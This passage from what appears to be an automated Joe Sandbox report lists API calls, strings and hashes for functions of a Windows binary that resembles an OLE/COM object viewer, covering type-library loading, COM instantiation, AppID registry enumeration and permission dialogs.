                                                                          • CLSIDFromProgID.OLE32(?,?,?,?,?), ref: 00D2B7F1
                                                                          • CoCreateInstance.OLE32(?,00000000,?), ref: 00D2B824
                                                                          • #538.MFC42U(?), ref: 00D2B836
                                                                          • #540.MFC42U ref: 00D2B84A
                                                                          • #2810.MFC42U(?,CoCreateInstance failed using the CLSID for '%s',?), ref: 00D2B862
                                                                            • Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
                                                                            • Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
                                                                            • Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
                                                                            • Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
                                                                            • Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
                                                                            • Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
                                                                            • Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
                                                                            • Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13
                                                                          • #800.MFC42U(?,8007000E), ref: 00D2B8F8
                                                                          Strings
                                                                          • The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file., xrefs: 00D2B8DD
                                                                          • CoCreateInstance failed using the CLSID for '%s', xrefs: 00D2B85C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#2810#538#540$Create$#1197#1662#2644#858#922BindDisplayFormatFreeFromH_prolog3H_prolog3_InstanceLocalMessageNameParseProglstrcpy
                                                                          • String ID: CoCreateInstance failed using the CLSID for '%s'$The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Library file.
                                                                          • API String ID: 2990471804-1967779486
                                                                          • Opcode ID: 88633d838a4a3fe5bf942d33d9355b51f230ea9185333f007fa9f7fdbb0856b9
                                                                          • Instruction ID: 12f2fbb8a12910623fce48e26043baeb059a642e472e5e4758d2718f5f4e7189
                                                                          • Opcode Fuzzy Hash: 88633d838a4a3fe5bf942d33d9355b51f230ea9185333f007fa9f7fdbb0856b9
                                                                          • Instruction Fuzzy Hash: 825149759012289FCB00DFA0E995ADEBBB9EF18324F1441A5F915B72A1DB70AE05CF70
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D3110A
                                                                          • SetActiveWindow.USER32(?,00000228), ref: 00D3111B
                                                                          • #2859.MFC42U(00000000), ref: 00D31122
                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D3112E
                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D31152
                                                                          • #1165.MFC42U ref: 00D31158
                                                                          • #538.MFC42U(?), ref: 00D31187
                                                                            • Part of subcall function 00D34899: #1662.MFC42U ref: 00D348D9
                                                                            • Part of subcall function 00D34899: #540.MFC42U ref: 00D348F3
                                                                            • Part of subcall function 00D34899: lstrcpyW.KERNEL32(?,00000000), ref: 00D34912
                                                                            • Part of subcall function 00D34899: CreateBindCtx.OLE32(00000000,?), ref: 00D34936
                                                                            • Part of subcall function 00D34899: MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00D34971
                                                                            • Part of subcall function 00D34899: #2644.MFC42U ref: 00D349D1
                                                                            • Part of subcall function 00D34899: #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 00D349E9
                                                                            • Part of subcall function 00D34899: #800.MFC42U(?,00000000), ref: 00D34A19
                                                                          • #800.MFC42U(?,00000000,?), ref: 00D311B5
                                                                          • #538.MFC42U(?,?,00000000,?), ref: 00D311CB
                                                                            • Part of subcall function 00D342EB: #1662.MFC42U(23685920), ref: 00D34326
                                                                          • #800.MFC42U(00000000,?,?,?,00000000,?), ref: 00D311F9
                                                                          • LoadTypeLib.OLEAUT32(?,00000000), ref: 00D3121B
                                                                          • #540.MFC42U ref: 00D31258
                                                                          • #2810.MFC42U(?,The file droped (%s) is not a valid persistent OLE object or Type Library file.,?), ref: 00D31277
                                                                            • Part of subcall function 00D3D91D: __EH_prolog3.LIBCMT ref: 00D3D924
                                                                            • Part of subcall function 00D3D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,00D3B9B7,?,00000000,00000000,00000000), ref: 00D3D942
                                                                            • Part of subcall function 00D3D91D: #540.MFC42U ref: 00D3D94F
                                                                            • Part of subcall function 00D3D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 00D3D96C
                                                                            • Part of subcall function 00D3D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 00D3D97F
                                                                            • Part of subcall function 00D3D91D: #858.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D98C
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(00000000,?,?,?,?,?,?,?), ref: 00D3D997
                                                                            • Part of subcall function 00D3D91D: LocalFree.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 00D3D99F
                                                                            • Part of subcall function 00D3D91D: #1197.MFC42U(?,00000000,00000000,?,?,?,?), ref: 00D3D9AA
                                                                            • Part of subcall function 00D3D91D: #800.MFC42U(?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00D3DA13
                                                                          • #800.MFC42U(?,00000000), ref: 00D31296
                                                                          • DragFinish.SHELL32(?), ref: 00D312AF
                                                                          Strings
                                                                          • The file droped (%s) is not a valid persistent OLE object or Type Library file., xrefs: 00D31271
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#2810#540Drag$#1662#538FileQuery$#1165#1197#2644#2859#858#922ActiveBindCreateDisplayFinishFormatFreeH_prolog3H_prolog3_LoadLocalMessageNameParseTypeWindowlstrcpy
                                                                          • String ID: The file droped (%s) is not a valid persistent OLE object or Type Library file.
                                                                          • API String ID: 1998644663-3375467908
                                                                          • Opcode ID: fac1b7b13886c3a4aea8a3b53fdf3511d348a35d8d1bc65bb6c0cb01f99065c8
                                                                          • Instruction ID: 74334156825892bc2053fbfa5ff9c025f5c9e0a2db0c306485554cc00a2650ad
                                                                          • Opcode Fuzzy Hash: fac1b7b13886c3a4aea8a3b53fdf3511d348a35d8d1bc65bb6c0cb01f99065c8
                                                                          • Instruction Fuzzy Hash: 46413B79901229ABCB10EBA0DC89BDDB779FF19320F104295E505A7291DB34AE85CFB4
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00D30F1A
                                                                          • #355.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30F3C
                                                                          • #2507.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30F4A
                                                                          • #3494.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30F6B
                                                                          • LoadTypeLib.OLEAUT32(?,?), ref: 00D30F89
                                                                          • #540.MFC42U(?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30FA2
                                                                          • #3494.MFC42U(?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30FB8
                                                                          • #2810.MFC42U(?,LoadTypeLib( %s ) failed.,00000000,?,?,00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D30FCF
                                                                          • #800.MFC42U ref: 00D30FE1
                                                                          • #800.MFC42U(?,8007000E), ref: 00D30FF9
                                                                          • #800.MFC42U(?,00000354), ref: 00D31034
                                                                          • #800.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D3103F
                                                                          • #641.MFC42U(00000001,*.tlb,00000000,00001804,TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|,?,00000354), ref: 00D3104A
                                                                          Strings
                                                                          • LoadTypeLib( %s ) failed., xrefs: 00D30FC9
                                                                          • TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|, xrefs: 00D30F22
                                                                          • *.tlb, xrefs: 00D30F35
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #800$#3494$#2507#2810#355#540#641H_prolog3_LoadType
                                                                          • String ID: *.tlb$LoadTypeLib( %s ) failed.$TypeLib Files (*.tlb;*.olb;*.dll;*.ocx;*.exe)|*.tlb;*.olb;*.dll;*.ocx;*.exe|AllFiles(*.*)|*.*|
                                                                          • API String ID: 2313197997-4003309560
                                                                          • Opcode ID: 594198ac2f922ed30516748a0914b9d5f8ab2cc2afa15f2c87b28c9212370d3d
                                                                          • Instruction ID: 3c0e668d65d21bae924c51259321d52b53346e1313c5edeb3ed2728fafd58715
                                                                          • Opcode Fuzzy Hash: 594198ac2f922ed30516748a0914b9d5f8ab2cc2afa15f2c87b28c9212370d3d
                                                                          • Instruction Fuzzy Hash: 75315C319006689FCB2AEB50DC81AEDBB78EF14705F0800D5B445771A1DA715F88CF71
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D30826
                                                                          • #4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo,Launch Permissions,00000004), ref: 00D3083E
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D30853
                                                                          • SetCursor.USER32(00000000), ref: 00D3085A
                                                                          • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D3088A
                                                                          • #2634.MFC42U(00000000), ref: 00D30897
                                                                          • #2634.MFC42U(00000000,00000000), ref: 00D308A3
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D308AE
                                                                          • SetCursor.USER32(00000000), ref: 00D308B5
                                                                          • #4118.MFC42U ref: 00D308C3
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D308DB
                                                                          • #5977.MFC42U ref: 00D308E4
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D308F2
                                                                          Strings
                                                                          • Launch Permissions, xrefs: 00D30832
                                                                          • LaunchPermission, xrefs: 00D30860
                                                                          • Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo, xrefs: 00D30837
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageSend$#2634Load$#4118#4219#5977
                                                                          • String ID: Launch Permissions$LaunchPermission$Selecting default permissions will delete any changes you have ever made to the launch permission list of this application. Are yo
                                                                          • API String ID: 791338786-3477396783
                                                                          • Opcode ID: 236455aa2493c096d544ed4a0cf680fdfbaed8f3c1118742709072c01afbba51
                                                                          • Instruction ID: 61d3777422edaaf04db4c580f3e76cac49c40825e35818035b3cb4cff2c45de1
                                                                          • Opcode Fuzzy Hash: 236455aa2493c096d544ed4a0cf680fdfbaed8f3c1118742709072c01afbba51
                                                                          • Instruction Fuzzy Hash: 72216D31240320BBEB216F61DC4EFDB3F29DF47751F050030BA0A99196CBA45886C6F0
                                                                          APIs
                                                                          • #5031.MFC42U(?,?,?), ref: 00D2D301
                                                                          • #6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 00D2D34C
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2D320
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8B7
                                                                            • Part of subcall function 00D2C8A6: ScreenToClient.USER32(?,?), ref: 00D2C8C4
                                                                            • Part of subcall function 00D2C8A6: #3133.MFC42U(?,?,?,00D2C46E,?), ref: 00D2C8CC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2D36B
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D38B
                                                                          • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D3BC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2D3E6
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D406
                                                                          • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D430
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2D44F
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D46F
                                                                          • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D499
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2D4B8
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D4D8
                                                                          • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D502
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00D2D521
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2D541
                                                                          • #6193.MFC42U(00000000,00000005,00000019,?,?,00000000), ref: 00D2D568
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6193RectWindow$MessageSend$ClientScreen$#3133#5031
                                                                          • String ID:
                                                                          • API String ID: 4086507556-0
                                                                          • Opcode ID: 0e8f03078245da8921e96ba15ee09773a144c9de9408506fbf0273256e389c72
                                                                          • Instruction ID: 437af59268f891e6bc00a322c403abe5fdc9c566665eff27fdfe99f20e256468
                                                                          • Opcode Fuzzy Hash: 0e8f03078245da8921e96ba15ee09773a144c9de9408506fbf0273256e389c72
                                                                          • Instruction Fuzzy Hash: D2815074640309AFEB20DFB4DC89FEFBBBAEB44704F144528B615A61E4D7B06905DAB0
                                                                          APIs
                                                                          • #540.MFC42U(23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EBFF
                                                                          • #540.MFC42U(23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC07
                                                                          • #4155.MFC42U(00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC11
                                                                          • #4155.MFC42U(00000008,00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC1B
                                                                          • #6398.MFC42U(?,?,?,00000008,00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC32
                                                                          • #861.MFC42U(ViewHiddenComCats,?,?,?,00000008,00000004,23685920,?,?,?,?,?,00D404CF,000000FF), ref: 00D2EC3F
                                                                          • #6398.MFC42U(?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920,?,?,?,?,?,00D404CF), ref: 00D2EC4F
                                                                          • #861.MFC42U(ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC5C
                                                                          • #6398.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC6C
                                                                          • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC74
                                                                          • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC7C
                                                                          • #800.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC84
                                                                          • #652.MFC42U(?,?,?,ExpertMode,?,?,?,ViewHiddenComCats,?,?,?,00000008,00000004,23685920), ref: 00D2EC8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6398#800$#4155#540#861$#652
                                                                          • String ID: ExpertMode$ViewHiddenComCats
                                                                          • API String ID: 800799730-816868219
                                                                          • Opcode ID: 0cee52d62504910397a95696aba08573b7c7bf7ecaf2c912e29ce854417550bc
                                                                          • Instruction ID: 6146b6ed3b900e2a277e91171fb1bd6773d945df4ebd5b03642c1c40ad20879c
                                                                          • Opcode Fuzzy Hash: 0cee52d62504910397a95696aba08573b7c7bf7ecaf2c912e29ce854417550bc
                                                                          • Instruction Fuzzy Hash: 24216D35A40619ABCB19EB50DC52EBEBBB6FF54700F000528B552772E1DBB46E04CB30
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001,?,?,00D3BA6A,?), ref: 00D3C8C5
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,00D3BA6A,?), ref: 00D3C8CC
                                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00D3BA6A,?,00D3BA6A,?), ref: 00D3C8E7
                                                                          • GetLastError.KERNEL32(?,00D3BA6A,?), ref: 00D3C8ED
                                                                          • CloseHandle.KERNEL32(?,00D3BA6A,?), ref: 00D3C921
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                          • String ID:
                                                                          • API String ID: 2078281146-0
                                                                          • Opcode ID: 64757299754aad969bf740453b0b792ac6df4b055c7d704f1b8ab1f96417dac9
                                                                          • Instruction ID: 654802625287aadbb4b92f7dfd8766da2cead2408cf6a0af84a557eb4b048f30
                                                                          • Opcode Fuzzy Hash: 64757299754aad969bf740453b0b792ac6df4b055c7d704f1b8ab1f96417dac9
                                                                          • Instruction Fuzzy Hash: EF31C13A510215EFCB115FA4EC08B6E7BB9EF4A312F265026F941F6260DB3489909FB0
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2C086
                                                                          • #4219.MFC42U(Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo,Access Permissions,00000004), ref: 00D2C09E
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00D2C0B3
                                                                          • SetCursor.USER32(00000000), ref: 00D2C0BA
                                                                          • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2C0EA
                                                                          • #2634.MFC42U(00000000), ref: 00D2C0F7
                                                                          • #2634.MFC42U(00000000,00000000), ref: 00D2C103
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D2C10E
                                                                          • SetCursor.USER32(00000000), ref: 00D2C115
                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C12D
                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C13D
                                                                          Strings
                                                                          • Access Permissions, xrefs: 00D2C092
                                                                          • Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo, xrefs: 00D2C097
                                                                          • AccessPermission, xrefs: 00D2C0C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageSend$#2634Load$#4219
                                                                          • String ID: Access Permissions$AccessPermission$Selecting default permissions will delete any changes you have ever made to the access permission list of this application. Are yo
                                                                          • API String ID: 2901272449-2859256857
                                                                          • Opcode ID: 572584b09168810b351e9b48ccd47c47fbd944758adffddd27ed4148476dc8f5
                                                                          • Instruction ID: 11b50099079462d07c64fba5c0d0b4f73f7110dd057d1fc7ec800d5b21eb63af
                                                                          • Opcode Fuzzy Hash: 572584b09168810b351e9b48ccd47c47fbd944758adffddd27ed4148476dc8f5
                                                                          • Instruction Fuzzy Hash: 7511A232140720BBEB216F61EC8EFE73B29DF97B65F114074BA05D9196CBA51845C6B0
                                                                          APIs
                                                                          • RegOpenKeyW.ADVAPI32(80000000,AppID,00000000), ref: 00D35653
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000100), ref: 00D3569A
                                                                          • wsprintfW.USER32 ref: 00D35754
                                                                          • RegQueryValueW.ADVAPI32(80000000,?,?,00000100), ref: 00D35777
                                                                          • CLSIDFromString.OLE32(00000000,-00000008), ref: 00D357CF
                                                                          • lstrcpyW.KERNEL32(-00000084,?), ref: 00D3584A
                                                                          • lstrlenW.KERNEL32(?), ref: 00D358A8
                                                                          • wsprintfW.USER32 ref: 00D358C5
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00D358FE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: wsprintf$CloseEnumFromOpenQueryStringValuelstrcpylstrlen
                                                                          • String ID: '$AppID$AppID\%s$[AppID: %s]
                                                                          • API String ID: 1953670596-3682975055
                                                                          • Opcode ID: f3a10f0a93ead08e15be30c4a80a0ab3963e894e6e3c21142491065a81b22d42
                                                                          • Instruction ID: 1afd996e66f4569fc6a98f2a7bf1b3defc38756eb6ab3da33ee8dbec28ac3961
                                                                          • Opcode Fuzzy Hash: f3a10f0a93ead08e15be30c4a80a0ab3963e894e6e3c21142491065a81b22d42
                                                                          • Instruction Fuzzy Hash: 2781B2B5900A2C9FDB60CF54EC45BEABBB8BB09316F1045E9E509E6290D7749BC4CF60
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E482
                                                                          • #6211.MFC42U(00000005,?,?,?,?,?,00D2E130,?,?), ref: 00D2E49B
                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00D2E4AA
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E4BE
                                                                            • Part of subcall function 00D2E583: #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5BE
                                                                            • Part of subcall function 00D2E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E669
                                                                          • SendMessageW.USER32(?,00001308,00000001,00000000), ref: 00D2E4DA
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E4ED
                                                                          • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E504
                                                                          • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00D2E528
                                                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D2E53B
                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00D2E555
                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E569
                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,00D2E130,?,?), ref: 00D2E578
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$RedrawWindow$#6211
                                                                          • String ID: Registry
                                                                          • API String ID: 2246854860-886996828
                                                                          • Opcode ID: 90c27999a25e0c2ae2c810881859ea10fd27a594414eda18524277c37d25f620
                                                                          • Instruction ID: e29276208a352a64217c018421fe45d233d6a6fe0ab018d7b7cd5771542c89f5
                                                                          • Opcode Fuzzy Hash: 90c27999a25e0c2ae2c810881859ea10fd27a594414eda18524277c37d25f620
